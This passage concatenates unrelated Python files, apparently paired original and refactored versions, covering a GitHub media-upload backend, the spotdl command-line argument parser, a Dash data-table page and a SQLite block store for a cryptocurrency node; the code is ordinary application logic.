                r"/repos/{owner}/{repo}/contents/{path}",
                "PUT",
                route=dict(owner=self.owner, repo=self.repo, path=relpath),
                data=dict(
                    message=f"Add media item {relpath}",
                    content=base64.b64encode(opaque_file.contents).decode(),
                ),
            )
            created = True
        return base.AddedMediaItem(uploaded_uri, created)

    def _add_media(
        self, media: typing.List[base.OpaqueFile]
    ) -> typing.List[base.AddedMediaItem]:
        """Add each media file, via local staging or straight to the repo."""
        items: typing.List[base.AddedMediaItem] = []
        for item in media:
            relpath = f"{self.mediadir}/{item.hexdigest}/{item.filename}"
            if self.mediastaging:
                items += self._add_media_staging([item])
            else:
                items.append(self._add_repo_file_if_not_exists(relpath, item))
        return items

    def _delete_media(self, uris: typing.List[str]):
        """Delete media from Github.

        Not required for the implementation, but useful for e2e tests.
        Assumes URIs are raw.githubusercontent.com URIs - NOT final
        published content URIs! Again, this is really just for testing.

        TODO: Modify this to work in remote media dir mode, and make it a
        noop in local staging mode. Was originally written assuming the
        media endpoint uploads directly to a staging directory in the
        Github repo and the files are later moved; now, in staging mode,
        Interpersonal holds media files temporarily on its own server, so
        this is only useful in remote media dir mode.
        """
        # The escaped prefix is loop-invariant; compute it once.
        esc_uri_prefix = re.escape(
            f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/"
        )
        for uri in uris:
            relpath = re.sub(esc_uri_prefix, "", uri)
            # Github requires the current blob sha to delete a file.
            get_resp = self._logged_api(
                r"/repos/{owner}/{repo}/contents/{path}",
                "GET",
                route=dict(owner=self.owner, repo=self.repo, path=relpath),
            )
            # Actually delete the file, referencing the file's sha
            self._logged_api(
                r"/repos/{owner}/{repo}/contents/{path}",
                "DELETE",
                route=dict(owner=self.owner, repo=self.repo, path=relpath),
                data=dict(
                    message=f"Remove media item {relpath}",
                    sha=get_resp["sha"],
                ),
            )

    def _collect_media_for_post(
        self, postslug: str, postbody: str, section: str, media: typing.List[str]
    ) -> str:
        """Move staged media into the post's repo bundle; return updated body.

        Each staging URI in *media* that belongs to this Interpersonal
        instance is uploaded from local staging into the post bundle, and
        every occurrence in *postbody* is rewritten to its collected URI.
        """
        for staging_uri in media:
            if not staging_uri.startswith(self.interpersonal_uri):
                current_app.logger.debug(
                    f"Media collection will skip URI '{staging_uri}' as it is not prefixed with what we expect '{self.interpersonal_uri}'."
                )
                continue
            # Staging URIs end in .../<digest>/<filename>
            splituri = staging_uri.split("/")
            digest = splituri[-2]
            filename = splituri[-1]
            localpath = os.path.join(self.mediastaging, digest, filename)
            # NOTE(review): hardcodes "content" rather than self.dirs.content
            # — confirm they always agree.
            repopath = os.path.join("content", section, postslug, digest, filename)
            if not os.path.exists(localpath):
                raise InterpersonalNotFoundError(localpath)
            new_uri = self._media_item_uri_collected(postslug, section, staging_uri)
            postbody = re.sub(re.escape(staging_uri), new_uri, postbody)
            repofile = self._get_repo_file_if_exists(repopath)
            if repofile:
                current_app.logger.debug(
                    f"Media already exists at {repopath}, nothing to do..."
                )
                continue
            current_app.logger.debug(
                f"Media does not yet exist at {repopath}, will upload..."
            )
            with open(localpath, "rb") as fp:
                b64content = base64.b64encode(fp.read()).decode()
            self._logged_api(
                r"/repos/{owner}/{repo}/contents/{path}",
                "PUT",
                route=dict(owner=self.owner, repo=self.repo, path=repopath),
                data=dict(
                    message=f"Add media item {repopath}",
                    content=b64content,
                ),
            )
        return postbody
"""
Module that handles the command line arguments.
"""
import sys
from argparse import _ArgumentGroup, ArgumentParser, Namespace
from spotdl import _version
from spotdl.download.progress_handler import NAME_TO_LEVEL
from spotdl.utils.ffmpeg import FFMPEG_FORMATS
from spotdl.utils.config import DEFAULT_CONFIG
from spotdl.utils.formatter import VARS
from spotdl.download.downloader import (
AUDIO_PROVIDERS,
LYRICS_PROVIDERS,
)
OPERATIONS = ["download", "save", "preload", "web", "sync"]
def parse_arguments() -> Namespace:
    """
    Parse arguments from the command line.

    ### Returns
    - A Namespace object containing the parsed arguments.
    """
    parser = ArgumentParser(
        prog="spotdl",
        description="Download your Spotify playlists and songs along with album art and metadata",
    )

    # Each option group gets its own section in the --help output; the
    # corresponding parse_* helper populates it.
    option_groups = [
        ("Main options", parse_main_options),
        ("Spotify options", parse_spotify_options),
        ("FFmpeg options", parse_ffmpeg_options),
        ("Output options", parse_output_options),
        ("Misc options", parse_misc_options),
        ("Other options", parse_other_options),
    ]
    for title, populate in option_groups:
        populate(parser.add_argument_group(title))

    return parser.parse_args()
def parse_main_options(parser: _ArgumentGroup):
    """
    Parse main options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Add operation argument
    operation = parser.add_argument(
        "operation",
        choices=OPERATIONS,
        help="The operation to perform.",
    )

    # Add query argument
    query = parser.add_argument(
        "query",
        nargs="+",
        type=str,
        help="URL for a song/playlist/album/artist/etc. to download.",
    )

    # When launched as "spotdl web" (or as a frozen binary without arguments)
    # the positional arguments are not needed, so they are removed again.
    try:
        is_web = sys.argv[1] == "web"
    except IndexError:
        is_web = False

    is_frozen = getattr(sys, "frozen", False)
    if (is_frozen and len(sys.argv) < 2) or (len(sys.argv) > 1 and is_web):
        if not is_web or (is_frozen and not is_web):
            parser._remove_action(operation)  # pylint: disable=protected-access
        parser._remove_action(query)  # pylint: disable=protected-access

    # Audio provider argument
    parser.add_argument(
        "--audio",
        dest="audio_providers",
        nargs="*",
        choices=AUDIO_PROVIDERS,
        default=DEFAULT_CONFIG["audio_providers"],
        help="The audio provider to use. You can provide more than one for fallback.",
    )

    # Lyrics provider argument
    parser.add_argument(
        "--lyrics",
        dest="lyrics_providers",
        nargs="*",
        choices=LYRICS_PROVIDERS.keys(),
        default=DEFAULT_CONFIG["lyrics_providers"],
        help="The lyrics provider to use. You can provide more than one for fallback.",
    )

    # Add config argument
    parser.add_argument(
        "--config",
        action="store_true",
        help=(
            "Use the config file to download songs. "
            "It's located under `C:\\Users\\user\\.spotdl\\config.json` "
            "or `~/.spotdl/config.json` under linux"
        ),
    )

    # Add search query argument
    # FIX: the replacement field must use quotes different from the f-string
    # delimiter; reusing double quotes is a SyntaxError on Python < 3.12
    # (quote reuse was only legalized by PEP 701).
    parser.add_argument(
        "--search-query",
        default=DEFAULT_CONFIG["search_query"],
        help=f"The search query to use, available variables: {', '.join(VARS)}",
    )

    # Add don't filter results argument
    parser.add_argument(
        "--dont-filter-results",
        action="store_false",
        dest="filter_results",
        default=DEFAULT_CONFIG["filter_results"],
        help="Disable filtering results.",
    )
def parse_spotify_options(parser: _ArgumentGroup):
    """
    Parse spotify options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Flag name plus the add_argument keyword arguments for every Spotify
    # option, registered in one pass below.
    spotify_flags = (
        (
            "--user-auth",
            {
                "action": "store_true",
                "default": DEFAULT_CONFIG["user_auth"],
                "help": "Login to Spotify using OAuth.",
            },
        ),
        (
            "--client-id",
            {
                "default": DEFAULT_CONFIG["client_id"],
                "help": "The client id to use when logging in to Spotify.",
            },
        ),
        (
            "--client-secret",
            {
                "default": DEFAULT_CONFIG["client_secret"],
                "help": "The client secret to use when logging in to Spotify.",
            },
        ),
        (
            "--cache-path",
            {
                "type": str,
                "default": DEFAULT_CONFIG["cache_path"],
                "help": "The path where spotipy cache file will be stored.",
            },
        ),
        (
            "--no-cache",
            {
                "action": "store_true",
                "default": DEFAULT_CONFIG["no_cache"],
                "help": "Disable caching.",
            },
        ),
        (
            "--cookie-file",
            {
                "default": DEFAULT_CONFIG["cookie_file"],
                "help": "Path to cookies file.",
            },
        ),
    )
    for flag, kwargs in spotify_flags:
        parser.add_argument(flag, **kwargs)
def parse_ffmpeg_options(parser: _ArgumentGroup):
    """
    Parse ffmpeg options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # ffmpeg executable to invoke
    parser.add_argument(
        "--ffmpeg",
        default=DEFAULT_CONFIG["ffmpeg"],
        help="The ffmpeg executable to use.",
    )

    # Number of parallel download threads
    parser.add_argument(
        "--threads",
        type=int,
        default=DEFAULT_CONFIG["threads"],
        help="The number of threads to use when downloading songs.",
    )

    # Constant bitrate; the accepted choices are generated from the
    # supported kbit/s values instead of being spelled out one by one.
    supported_kbps = (8, 16, 24, 32, 40, 48, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320)
    parser.add_argument(
        "--bitrate",
        choices=[f"{kbps}k" for kbps in supported_kbps],
        type=str.lower,
        default=DEFAULT_CONFIG["bitrate"],
        help="The constant bitrate to use for the output file.",
    )

    # Extra arguments forwarded verbatim to ffmpeg
    parser.add_argument(
        "--ffmpeg-args",
        type=str,
        default=DEFAULT_CONFIG["ffmpeg_args"],
        help="Additional ffmpeg arguments passed as a string.",
    )
def parse_output_options(parser: _ArgumentGroup):
    """
    Parse output options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Add output format argument
    parser.add_argument(
        "--format",
        choices=FFMPEG_FORMATS.keys(),
        default=DEFAULT_CONFIG["format"],
        help="The format to download the song in.",
    )

    # Add save file argument; mandatory for the save/preload operations
    parser.add_argument(
        "--save-file",
        type=str,
        default=DEFAULT_CONFIG["save_file"],
        help="The file to save/load the songs data from/to. It has to end with .spotdl",
        required=len(sys.argv) > 1 and sys.argv[1] in ["save", "preload"],
    )

    # Add name format argument
    # FIX: the replacement field must use quotes different from the f-string
    # delimiter; reusing double quotes is a SyntaxError on Python < 3.12
    # (quote reuse was only legalized by PEP 701).
    parser.add_argument(
        "--output",
        type=str,
        default=DEFAULT_CONFIG["output"],
        help=f"Specify the downloaded file name format, available variables: {', '.join(VARS)}",
    )

    # Add m3u argument
    parser.add_argument(
        "--m3u",
        type=str,
        default=DEFAULT_CONFIG["m3u"],
        help="Name of the m3u file to save the songs to.",
    )

    # Add overwrite argument
    parser.add_argument(
        "--overwrite",
        choices={"force", "skip"},
        default=DEFAULT_CONFIG["overwrite"],
        help="Overwrite existing files.",
    )

    # Option to restrict filenames for easier handling in the shell
    parser.add_argument(
        "--restrict",
        default=DEFAULT_CONFIG["restrict"],
        help="Restrict filenames to ASCII only",
        action="store_true",
    )

    # Option to print errors on exit, useful for long playlist
    parser.add_argument(
        "--print-errors",
        default=DEFAULT_CONFIG["print_errors"],
        help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist",
        action="store_true",
    )

    # Option to use sponsor block
    parser.add_argument(
        "--sponsor-block",
        default=DEFAULT_CONFIG["sponsor_block"],
        help="Use the sponsor block to download songs from yt/ytm.",
        action="store_true",
    )
def parse_misc_options(parser: _ArgumentGroup):
    """
    Parse misc options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """
    add_option = parser.add_argument

    # Logging verbosity selector
    add_option(
        "--log-level",
        choices=NAME_TO_LEVEL.keys(),
        help="Select log level.",
    )

    # Simple TUI toggle
    add_option(
        "--simple-tui",
        action="store_true",
        default=DEFAULT_CONFIG["simple_tui"],
        help="Use a simple tui.",
    )

    # Headless mode toggle
    add_option(
        "--headless",
        action="store_true",
        default=DEFAULT_CONFIG["headless"],
        help="Run in headless mode.",
    )
def parse_other_options(parser: _ArgumentGroup):
    """
    Parse other options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Plain store_true switches, registered in one pass.
    switches = (
        ("--download-ffmpeg", "Download ffmpeg to spotdl directory."),
        ("--generate-config", "Generate a config file. This will overwrite current config if present."),
        ("--check-for-updates", "Check for new version."),
        ("--profile", "Run in profile mode. Useful for debugging."),
    )
    for flag, description in switches:
        parser.add_argument(flag, action="store_true", help=description)

    # Version flag, handled by argparse's built-in "version" action.
    parser.add_argument(
        "--version",
        "-v",
        action="version",
        help="Show the version number and exit.",
        version=_version.__version__,
    )
| """
Module that handles the command line arguments.
"""
import sys
from argparse import _ArgumentGroup, ArgumentParser, Namespace
from spotdl import _version
from spotdl.download.progress_handler import NAME_TO_LEVEL
from spotdl.utils.ffmpeg import FFMPEG_FORMATS
from spotdl.utils.config import DEFAULT_CONFIG
from spotdl.utils.formatter import VARS
from spotdl.download.downloader import (
AUDIO_PROVIDERS,
LYRICS_PROVIDERS,
)
# Sub-commands accepted as the positional "operation" argument of the CLI.
OPERATIONS = ["download", "save", "preload", "web", "sync"]
def parse_arguments() -> Namespace:
    """
    Parse arguments from the command line.

    ### Returns
    - A Namespace object containing the parsed arguments.
    """
    # Top-level parser; option registration is delegated to one helper
    # per argument group.
    parser = ArgumentParser(
        prog="spotdl",
        description="Download your Spotify playlists and songs along with album art and metadata",
    )

    parse_main_options(parser.add_argument_group("Main options"))
    parse_spotify_options(parser.add_argument_group("Spotify options"))
    parse_ffmpeg_options(parser.add_argument_group("FFmpeg options"))
    parse_output_options(parser.add_argument_group("Output options"))
    parse_misc_options(parser.add_argument_group("Misc options"))
    parse_other_options(parser.add_argument_group("Other options"))

    return parser.parse_args()
def parse_main_options(parser: _ArgumentGroup):
    """
    Parse main options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Positional arguments: the sub-command and the download query.
    operation = parser.add_argument(
        "operation",
        choices=OPERATIONS,
        help="The operation to perform.",
    )
    query = parser.add_argument(
        "query",
        nargs="+",
        type=str,
        help="URL for a song/playlist/album/artist/etc. to download.",
    )

    # When running the web UI (or a frozen build started without arguments)
    # the positionals are not needed, so they are removed again.
    web_invocation = len(sys.argv) > 1 and sys.argv[1] == "web"
    frozen_build = getattr(sys, "frozen", False)
    if (frozen_build and len(sys.argv) < 2) or (len(sys.argv) > 1 and web_invocation):
        if not web_invocation or (frozen_build and not web_invocation):
            parser._remove_action(operation)  # pylint: disable=protected-access
        parser._remove_action(query)  # pylint: disable=protected-access

    add_option = parser.add_argument

    # Audio provider(s), in fallback order
    add_option(
        "--audio",
        dest="audio_providers",
        nargs="*",
        choices=AUDIO_PROVIDERS,
        default=DEFAULT_CONFIG["audio_providers"],
        help="The audio provider to use. You can provide more than one for fallback.",
    )

    # Lyrics provider(s), in fallback order
    add_option(
        "--lyrics",
        dest="lyrics_providers",
        nargs="*",
        choices=LYRICS_PROVIDERS.keys(),
        default=DEFAULT_CONFIG["lyrics_providers"],
        help="The lyrics provider to use. You can provide more than one for fallback.",
    )

    # Use the on-disk config file
    add_option(
        "--config",
        action="store_true",
        help=(
            "Use the config file to download songs. "
            "It's located under `C:\\Users\\user\\.spotdl\\config.json` "
            "or `~/.spotdl/config.json` under linux"
        ),
    )

    # Search-query template
    add_option(
        "--search-query",
        default=DEFAULT_CONFIG["search_query"],
        help=f"The search query to use, available variables: {', '.join(VARS)}",
    )

    # Disable result filtering
    add_option(
        "--dont-filter-results",
        action="store_false",
        dest="filter_results",
        default=DEFAULT_CONFIG["filter_results"],
        help="Disable filtering results.",
    )
def parse_spotify_options(parser: _ArgumentGroup):
    """
    Parse spotify options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """
    add_option = parser.add_argument

    # OAuth login
    add_option(
        "--user-auth",
        action="store_true",
        default=DEFAULT_CONFIG["user_auth"],
        help="Login to Spotify using OAuth.",
    )

    # API credentials
    add_option(
        "--client-id",
        default=DEFAULT_CONFIG["client_id"],
        help="The client id to use when logging in to Spotify.",
    )
    add_option(
        "--client-secret",
        default=DEFAULT_CONFIG["client_secret"],
        help="The client secret to use when logging in to Spotify.",
    )

    # Spotipy cache control
    add_option(
        "--cache-path",
        type=str,
        default=DEFAULT_CONFIG["cache_path"],
        help="The path where spotipy cache file will be stored.",
    )
    add_option(
        "--no-cache",
        action="store_true",
        default=DEFAULT_CONFIG["no_cache"],
        help="Disable caching.",
    )

    # Cookie file
    add_option(
        "--cookie-file",
        default=DEFAULT_CONFIG["cookie_file"],
        help="Path to cookies file.",
    )
def parse_ffmpeg_options(parser: _ArgumentGroup):
    """
    Parse ffmpeg options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """
    add_option = parser.add_argument

    # ffmpeg executable to invoke
    add_option(
        "--ffmpeg",
        default=DEFAULT_CONFIG["ffmpeg"],
        help="The ffmpeg executable to use.",
    )

    # Number of parallel download threads
    add_option(
        "--threads",
        type=int,
        default=DEFAULT_CONFIG["threads"],
        help="The number of threads to use when downloading songs.",
    )

    # Constant bitrate for the output file
    bitrate_choices = [
        "8k", "16k", "24k", "32k", "40k", "48k", "64k", "80k",
        "96k", "112k", "128k", "160k", "192k", "224k", "256k", "320k",
    ]
    add_option(
        "--bitrate",
        choices=bitrate_choices,
        type=str.lower,
        default=DEFAULT_CONFIG["bitrate"],
        help="The constant bitrate to use for the output file.",
    )

    # Extra arguments forwarded verbatim to ffmpeg
    add_option(
        "--ffmpeg-args",
        type=str,
        default=DEFAULT_CONFIG["ffmpeg_args"],
        help="Additional ffmpeg arguments passed as a string.",
    )
def parse_output_options(parser: _ArgumentGroup):
    """
    Parse output options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """
    add_option = parser.add_argument

    # Output container/format
    add_option(
        "--format",
        choices=FFMPEG_FORMATS.keys(),
        default=DEFAULT_CONFIG["format"],
        help="The format to download the song in.",
    )

    # Save file; mandatory for the save/preload operations
    save_file_required = len(sys.argv) > 1 and sys.argv[1] in ["save", "preload"]
    add_option(
        "--save-file",
        type=str,
        default=DEFAULT_CONFIG["save_file"],
        help="The file to save/load the songs data from/to. It has to end with .spotdl",
        required=save_file_required,
    )

    # Output file name template
    add_option(
        "--output",
        type=str,
        default=DEFAULT_CONFIG["output"],
        help=f"Specify the downloaded file name format, available variables: {', '.join(VARS)}",
    )

    # Playlist file name
    add_option(
        "--m3u",
        type=str,
        default=DEFAULT_CONFIG["m3u"],
        help="Name of the m3u file to save the songs to.",
    )

    # Existing-file policy
    add_option(
        "--overwrite",
        choices={"force", "skip"},
        default=DEFAULT_CONFIG["overwrite"],
        help="Overwrite existing files.",
    )

    # ASCII-only filenames for easier handling in the shell
    add_option(
        "--restrict",
        default=DEFAULT_CONFIG["restrict"],
        help="Restrict filenames to ASCII only",
        action="store_true",
    )

    # Print errors on exit, useful for long playlist
    add_option(
        "--print-errors",
        default=DEFAULT_CONFIG["print_errors"],
        help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist",
        action="store_true",
    )

    # SponsorBlock support
    add_option(
        "--sponsor-block",
        default=DEFAULT_CONFIG["sponsor_block"],
        help="Use the sponsor block to download songs from yt/ytm.",
        action="store_true",
    )
def parse_misc_options(parser: _ArgumentGroup):
    """
    Parse misc options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """

    # Logging verbosity selector
    parser.add_argument(
        "--log-level",
        choices=NAME_TO_LEVEL.keys(),
        help="Select log level.",
    )

    # Boolean switches that share the same shape, registered in one pass.
    for flag, config_key, description in (
        ("--simple-tui", "simple_tui", "Use a simple tui."),
        ("--headless", "headless", "Run in headless mode."),
    ):
        parser.add_argument(
            flag,
            action="store_true",
            default=DEFAULT_CONFIG[config_key],
            help=description,
        )
def parse_other_options(parser: _ArgumentGroup):
    """
    Parse other options from the command line.

    ### Arguments
    - parser: The argument parser to add the options to.
    """
    add_option = parser.add_argument

    # Fetch ffmpeg into the spotdl directory
    add_option(
        "--download-ffmpeg",
        action="store_true",
        help="Download ffmpeg to spotdl directory.",
    )

    # (Re)create the config file
    add_option(
        "--generate-config",
        action="store_true",
        help="Generate a config file. This will overwrite current config if present.",
    )

    # Version check
    add_option("--check-for-updates", action="store_true", help="Check for new version.")

    # Profiling mode
    add_option(
        "--profile",
        action="store_true",
        help="Run in profile mode. Useful for debugging.",
    )

    # Version flag, handled by argparse's built-in "version" action.
    add_option(
        "--version",
        "-v",
        action="version",
        help="Show the version number and exit.",
        version=_version.__version__,
    )
|
import dash
import dash_html_components as html
import dash_table
import pandas as pd
from app import app
#### GET DATA
dfAPI = pd.read_csv("freqs_data.csv")

#### LAYOUT
# Columns shown in the table; "data point" is intentionally omitted.
_column_names = ["ref#", "text type", "value", "freq", "fpm", "rel"]

# Sortable/filterable table of all records, values rounded to 2 decimals.
_records_table = dash_table.DataTable(
    id="table2",
    data=dfAPI.round(2).to_dict("records"),
    columns=[{"id": name, "name": name} for name in _column_names],
    sort_action="native",
    sort_mode="single",
    filter_action="native",
    page_action="native",
    page_size=100,
    style_table={
        "overflowX": "scroll",
        "maxHeight": "800px",
        "overflowY": "scroll",
    },
    style_data={"whiteSpace": "normal", "height": "auto"},
    style_cell={
        "minWidth": "70px",
        "maxWidth": "130px",
        "overflow": "hidden",
        "textOverflow": "ellipsis",
    },
    style_cell_conditional=[
        {"if": {"column_id": "text type"}, "textAlign": "left"},
        {"if": {"column_id": "value"}, "textAlign": "left"},
        {"if": {"column_id": "ref#"}, "textAlign": "center"},
    ],
)

layout = html.Div(
    [
        html.H6(children="All records"),
        html.Div([_records_table], style={"width": "100%"}),
    ]
)
| import dash
import dash_html_components as html
import dash_table
import pandas as pd
from app import app
#### GET DATA
dfAPI = pd.read_csv("freqs_data.csv")

#### LAYOUT
# One {"id", "name"} column entry per displayed column
# ("data point" is intentionally omitted).
_columns = ("ref#", "text type", "value", "freq", "fpm", "rel")

layout = html.Div(
    [
        html.H6(children="All records"),
        html.Div(
            [
                dash_table.DataTable(
                    id="table2",
                    data=dfAPI.round(2).to_dict("records"),
                    columns=[{"id": name, "name": name} for name in _columns],
                    sort_action="native",
                    sort_mode="single",
                    filter_action="native",
                    page_action="native",
                    page_size=100,
                    style_table={
                        "overflowX": "scroll",
                        "maxHeight": "800px",
                        "overflowY": "scroll",
                    },
                    style_data={"whiteSpace": "normal", "height": "auto"},
                    style_cell={
                        "minWidth": "70px",
                        "maxWidth": "130px",
                        "overflow": "hidden",
                        "textOverflow": "ellipsis",
                    },
                    # Per-column alignment overrides.
                    style_cell_conditional=[
                        {"if": {"column_id": column}, "textAlign": alignment}
                        for column, alignment in (
                            ("text type", "left"),
                            ("value", "left"),
                            ("ref#", "center"),
                        )
                    ],
                )
            ],
            style={"width": "100%"},
        ),
    ]
)
|
import logging
from typing import Dict, List, Optional, Tuple
import aiosqlite
from bytecash.consensus.block_record import BlockRecord
from bytecash.types.blockchain_format.sized_bytes import bytes32
from bytecash.types.full_block import FullBlock
from bytecash.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments
from bytecash.util.db_wrapper import DBWrapper
from bytecash.util.ints import uint32
from bytecash.util.lru_cache import LRUCache
log = logging.getLogger(__name__)
class BlockStore:
    """
    SQLite-backed store for full blocks, block records and weight-proof
    sub-epoch challenge segments, with small in-memory LRU caches in front
    of the database.
    """

    db: aiosqlite.Connection
    block_cache: LRUCache  # header_hash -> FullBlock
    db_wrapper: DBWrapper
    ses_challenge_cache: LRUCache  # ses_block_hash -> List[SubEpochChallengeSegment]

    @classmethod
    async def create(cls, db_wrapper: DBWrapper):
        """Create tables and indexes (if missing) and return a ready store."""
        self = cls()

        # All full blocks which have been added to the blockchain. Header_hash -> block
        self.db_wrapper = db_wrapper
        self.db = db_wrapper.db
        await self.db.execute(
            "CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,"
            " is_block tinyint, is_fully_compactified tinyint, block blob)"
        )

        # Block records
        await self.db.execute(
            "CREATE TABLE IF NOT EXISTS block_records(header_hash "
            "text PRIMARY KEY, prev_hash text, height bigint,"
            "block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)"
        )

        # todo remove in v1.2
        await self.db.execute("DROP TABLE IF EXISTS sub_epoch_segments_v2")

        # Sub epoch segments for weight proofs
        await self.db.execute(
            "CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY, challenge_segments blob)"
        )

        # Height index so we can look up in order of height for sync purposes
        await self.db.execute("CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)")
        await self.db.execute("CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)")
        await self.db.execute("CREATE INDEX IF NOT EXISTS height on block_records(height)")

        if self.db_wrapper.allow_upgrades:
            # Replace legacy indexes with a partial index over the peak row only.
            await self.db.execute("DROP INDEX IF EXISTS hh")
            await self.db.execute("DROP INDEX IF EXISTS is_block")
            await self.db.execute("DROP INDEX IF EXISTS peak")
            await self.db.execute(
                "CREATE INDEX IF NOT EXISTS is_peak_eq_1_idx on block_records(is_peak) where is_peak = 1"
            )
        else:
            await self.db.execute("CREATE INDEX IF NOT EXISTS peak on block_records(is_peak) where is_peak = 1")

        await self.db.commit()
        self.block_cache = LRUCache(1000)
        self.ses_challenge_cache = LRUCache(50)
        return self

    async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:
        """Insert (or replace) a full block and its block record. Not committed here."""
        self.block_cache.put(header_hash, block)
        cursor_1 = await self.db.execute(
            "INSERT OR REPLACE INTO full_blocks VALUES(?, ?, ?, ?, ?)",
            (
                header_hash.hex(),
                block.height,
                int(block.is_transaction_block()),
                int(block.is_fully_compactified()),
                bytes(block),
            ),
        )
        await cursor_1.close()

        cursor_2 = await self.db.execute(
            "INSERT OR REPLACE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)",
            (
                header_hash.hex(),
                block.prev_header_hash.hex(),
                block.height,
                bytes(block_record),
                None
                if block_record.sub_epoch_summary_included is None
                else bytes(block_record.sub_epoch_summary_included),
                False,  # is_peak is set separately via set_peak()
                block.is_transaction_block(),
            ),
        )
        await cursor_2.close()

    async def persist_sub_epoch_challenge_segments(
        self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]
    ) -> None:
        """Store (and commit) the challenge segments for one sub-epoch summary block."""
        async with self.db_wrapper.lock:
            cursor_1 = await self.db.execute(
                "INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)",
                (ses_block_hash.hex(), bytes(SubEpochSegments(segments))),
            )
            await cursor_1.close()
            await self.db.commit()

    async def get_sub_epoch_challenge_segments(
        self,
        ses_block_hash: bytes32,
    ) -> Optional[List[SubEpochChallengeSegment]]:
        """Return the cached or stored challenge segments, or None if absent."""
        cached = self.ses_challenge_cache.get(ses_block_hash)
        if cached is not None:
            return cached

        cursor = await self.db.execute(
            "SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?", (ses_block_hash.hex(),)
        )
        row = await cursor.fetchone()
        await cursor.close()

        if row is not None:
            challenge_segments = SubEpochSegments.from_bytes(row[0]).challenge_segments
            self.ses_challenge_cache.put(ses_block_hash, challenge_segments)
            return challenge_segments
        return None

    def rollback_cache_block(self, header_hash: bytes32):
        """Drop a block from the cache after a rollback (best effort)."""
        try:
            self.block_cache.remove(header_hash)
        except KeyError:
            # this is best effort. When rolling back, we may not have added the
            # block to the cache yet
            pass

    async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:
        """Return the full block for header_hash, or None if not stored."""
        cached = self.block_cache.get(header_hash)
        if cached is not None:
            log.debug(f"cache hit for block {header_hash.hex()}")
            return cached
        log.debug(f"cache miss for block {header_hash.hex()}")
        cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
        row = await cursor.fetchone()
        await cursor.close()
        if row is not None:
            block = FullBlock.from_bytes(row[0])
            self.block_cache.put(header_hash, block)
            return block
        return None

    async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:
        """Return the serialized block for header_hash, or None if not stored."""
        cached = self.block_cache.get(header_hash)
        if cached is not None:
            log.debug(f"cache hit for block {header_hash.hex()}")
            return bytes(cached)
        log.debug(f"cache miss for block {header_hash.hex()}")
        cursor = await self.db.execute("SELECT block from full_blocks WHERE header_hash=?", (header_hash.hex(),))
        row = await cursor.fetchone()
        await cursor.close()
        if row is not None:
            return row[0]
        return None

    async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:
        """Return all full blocks stored at any of the given heights."""
        if len(heights) == 0:
            return []

        heights_db = tuple(heights)
        # One "?" placeholder per height.
        # FIX: the inner quotes must differ from the f-string delimiter;
        # reusing the same quote is a SyntaxError on Python < 3.12 (PEP 701).
        formatted_str = f"SELECT block from full_blocks WHERE height in ({'?,' * (len(heights_db) - 1)}?)"
        cursor = await self.db.execute(formatted_str, heights_db)
        rows = await cursor.fetchall()
        await cursor.close()
        return [FullBlock.from_bytes(row[0]) for row in rows]

    async def get_block_records_by_hash(self, header_hashes: List[bytes32]):
        """
        Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.
        Throws an exception if the blocks are not present
        """
        if len(header_hashes) == 0:
            return []

        header_hashes_db = tuple([hh.hex() for hh in header_hashes])
        # FIX: inner quotes must differ from the f-string delimiter (see above).
        formatted_str = f"SELECT block from block_records WHERE header_hash in ({'?,' * (len(header_hashes_db) - 1)}?)"
        cursor = await self.db.execute(formatted_str, header_hashes_db)
        rows = await cursor.fetchall()
        await cursor.close()
        all_blocks: Dict[bytes32, BlockRecord] = {}
        for row in rows:
            block_rec: BlockRecord = BlockRecord.from_bytes(row[0])
            all_blocks[block_rec.header_hash] = block_rec

        # Re-establish the caller's ordering; fail loudly on any missing hash.
        ret: List[BlockRecord] = []
        for hh in header_hashes:
            if hh not in all_blocks:
                raise ValueError(f"Header hash {hh} not in the blockchain")
            ret.append(all_blocks[hh])
        return ret

    async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:
        """
        Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.
        Throws an exception if the blocks are not present
        """
        if len(header_hashes) == 0:
            return []

        header_hashes_db = tuple([hh.hex() for hh in header_hashes])
        # FIX: inner quotes must differ from the f-string delimiter (see above).
        formatted_str = (
            f"SELECT header_hash, block from full_blocks WHERE header_hash in ({'?,' * (len(header_hashes_db) - 1)}?)"
        )
        cursor = await self.db.execute(formatted_str, header_hashes_db)
        rows = await cursor.fetchall()
        await cursor.close()
        all_blocks: Dict[bytes32, FullBlock] = {}
        for row in rows:
            header_hash = bytes.fromhex(row[0])
